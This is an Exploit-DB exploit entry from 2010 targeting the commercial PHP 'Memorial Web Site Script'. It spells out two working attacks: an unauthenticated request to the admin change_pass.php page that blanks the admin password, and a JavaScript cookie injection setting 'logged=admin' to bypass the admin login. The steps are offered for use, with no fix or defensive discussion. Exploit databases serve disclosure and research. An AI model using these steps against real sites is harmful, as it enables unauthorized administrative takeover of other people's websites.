Memorial Web Site Script - Reset Password / Insecure Cookie Handling

EDB-ID:

12358

CVE:

N/A




Platform:

PHP

Date:

2010-04-23


-----------------------------------------------------------------------
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
----------------------------------------------------------------------- 
Author	: Chip D3 Bi0s
Email	: chipdebios[alt+64]gmail.com
Where	: From Remote
Group	: LatinHackTeam


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application	: Memorial Web Site Script
Author		: Easy Scripts
Price		: $49
Vendor		: http://www.easy-scripts.net

description Bug:
~~~~~~~~~~~~~~~

To reset the password just use this:

http://127.0.0.1/[path]/admin/change_pass.php

so the password will be null, login with single user can
admin:

http://127.0.0.1/[path]/admin/

--------------------------

Insecure Cookie Handling

exploit:
javascript:document.cookie="logged=admin;path=/";

http://127.0.0.1/[path]/admin/
--------------------------



+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++